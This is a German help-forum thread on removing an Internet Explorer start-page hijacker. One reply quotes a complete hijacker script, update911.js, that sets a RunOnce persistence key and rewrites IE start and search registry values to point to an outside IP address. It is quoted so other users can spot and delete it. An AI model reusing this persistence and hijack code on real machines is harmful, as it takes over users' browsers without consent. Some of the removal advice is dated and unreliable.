IE Startseite nach jedem Neustart neu!

Hallo,

ja eben - "aus der selben Quelle..."

Wer mich einmal vergewaltigt, dem trau ich nicht, wenn er es angeblich ungeschehen machen will.

Sieh Dir mal an, was bei dem "Entfernen"-Link passiert:
1.) es wird eine Script-Datei heruntergeladen und (falls keine Sicherheitseinstallung das verhindert) sofort gestartet -> schon verdächtig !
2.) Diese Datei ist mit großem Aufwand recht effektiv verschlüsselt - man kann als "normaler Mensch" nicht nachvollziehen, was eigentlich passiert -> sehr verdächtig !

Ich hab mir das also angesehen und daraus den o.g. Tipp gemacht.
Tatsächlich scheint der "Entfernen"-Link nicht bösartig.

Original .html im Anhang als .txt

Gruß Horst Göllnitz
 

Anhänge

Zuletzt bearbeitet:
bei mir klappt es nicht

Ich werde diese fiese Seite nicht los egal was ich mache !
glaube ich werde Format C durchführen müssen
oder hat noch jemand eine Idee


Gruß Poul
 
Startseite IE

Problem: IE Startseite durch Fremdeinwirkung geändert und bei jedem Start wieder aktiv! http://www.search-space.com!

Woher Ich denke Skript oder beim Schliessen eines Popups i Aber ich weiß nicht

Alle Thread Tips und Maßnahmen schon ausgeführt - kein Erfolg!

Achso - der ganze Spaß durch ne Firewall + Virenscanner mit Guard + XP-Antispy + SPYBOT !

Naja über einen konkreten Lösungsansatz wäre ich echt angetan!

Danke ans FORUM UND AN DEN DER ANTWORTET
 
... aber ActiveX und/oder Scripting (Java-Script, VbScript) aktiv gehabt ? (in den IE-Einstellungen nachsehen)

... will mich gelegentlich (;-) mal drum kümmern.

Gruß Horst
 
Hi,

es handelt sich sicher um einen Skript, der immer wieder ausgeführt wird sobald Du dich abmeldest bzw. den Computer neu startest. Suche einfach mal auf C: nach *.js und öffne mit Wordpad, die Dateien die unter c:\windows + Unterordner oder c:\programme + Unterordner zu finden sind. Ausnahmen:

c:\windows\system32\oobe
c:\windows\help\tours
c:\programme\real\realone player

Also die Skripst in diesen Ordnern brauchst Du eigentlich nicht öffnen. Bei mir war die Datei update911.js, die unter c:windows zu finden war. Sie sah so aus:

var url = "http://81.211.105.8/index.php?v=1";
var burl = "http://81.211.105.8/search.php?v=1";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\update911.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\tlc",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Page",url);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Search Bar",burl);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Search Asst","no");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Use Custom Search URL",1,"REG_DWORD");

Sobald Du die Datei gefunden hast (muss nicht update911.js sein), einfach mal im Regedit den Eintrag löschen (und natürlich auch die Datei auf Deiner Festplatte).

ein nützliches Programm findest Du unter http://mjc1.com/mirror/hjt/. Das Programm zeigt alles, was mit Windows über die Registrierung (Regedit)gestartet wird. Einfach Programm starten --> Scann --> die entsprechenden Einträge markieren und --> Fix Cheched und sie zu löschen. Geht wesentlich schneller als mit Regedit zu suchen :)

Ich wünsche Dir viel Glück und Erfolg bei der Suche!

Viele Grüße
rojasa
 
IE

Danke für die Antworten - hab mal alles probiert! Keine ungewöhnliche Datei *.js gefunden! Den HiJACKER mal runtergeladen! Aber hat auch nur einmal was gebracht! Beim zweiten Start alles beim alten! Ich glaube fast da treibt mit mir einer nen übles Spiel - glaube der fast der Eintrag hat sich irgendwo an die IE-Startdatei angehangen! Mal sehen was ich noch so finde! Ansonsten läuft ja alles gut! Aber ich find den Rüpel schon - keine Angst! Trotzdem Vorschläge nehme ich gern an! Dankeschön!

ZionsGate

Zusatz!

Kann auf einmal keine Links mehr ausführen die z.B. auf einem Forumboard auf eine andere Seite verweisen! Ich glaub das hängt mit dem IE-Problem zusammen! Jetzt wirds echt bunt! Bitte um Hilfe!
 
Zuletzt bearbeitet:
IE Startseite

So für alle in diesem Forum - niemand konnte mir helfen! Leider schade aber habs nun endlich selbst geschaft!

Und zwar war der Fehler wie vermutet durch ein Skript, jemand hat mir durch die Firewall und Spybot eine dll zugeschoben die tatsächlich immer im Start mitlief Aber so gut getarnt, dass wirklich kein Programm die gefunden hatte! Schrecklich mies von dem hier angepriesenen Spybot S&D! Naja aber ein Programm hats nun doch geschafft und zwar "Security Task Manager" von http://www.neuber.com das ich hiermit hoch lobe und allen mit solchen Probs. vorschlage! Mein Rechner rattert nun wieder richtig und alle Probleme haben sich gelöst! Auf Wiederhören! Echo!
 
Hallo!

Ich hab mich gerade hier angemeldet, weil ich das selbe Problem hatte und ich euch sagen wollte wie ihr das wegbekommt.
Wir sind alle Opfer von Webseiten-Hijacking geworden. Das heißt durch die Java Virtual Machine von Microsoft ist dieser Trojaner auf das System gekommen. (Ich verwende eigentlich die Virtual Machine von Sun, aber ich hab ihn trotzdem erhalten.)

Symptome:

  • Umleitungen auf Coolwebsearch-verwandte Seiten
  • Umleitungen beim Vertippen bei der URL-Eingabe
  • Umleitungen, wenn man versucht, Google anzusurfen
  • IE wird extrem langsam
  • IE-Startseite ändert sich beim Rebooten
  • Fügt Websites in die "Sichere Zone" des IE hinzu
  • Popups bei Suche in Google und Yahoo
  • Fehler beim Windowsstart in bezug auf WIN.INI und IEDLL.EXE
  • Verhindern des Änderns/Aufrufens von IE-Einstellungen

Lösung

CWShredder

Bei mir hat es funktioniert. Ich hoffe ich konnte euch etwas weiterhelfen. Um eine Neuansteckung zu verhindern solltet ihr euch die Virtual Machine von Sun ziehen und mal euer Surf-verhalten kontrollieren.

mfg
 
Hi ich hatte bis grade egen auch das problem, jedoch mit einer anderen Seite.
Ich hab das Programm benutzt das GMI Empfohlen hat - es funktionier bei sowas (denk ich) am besten.

greez nEutRa
 
Zurück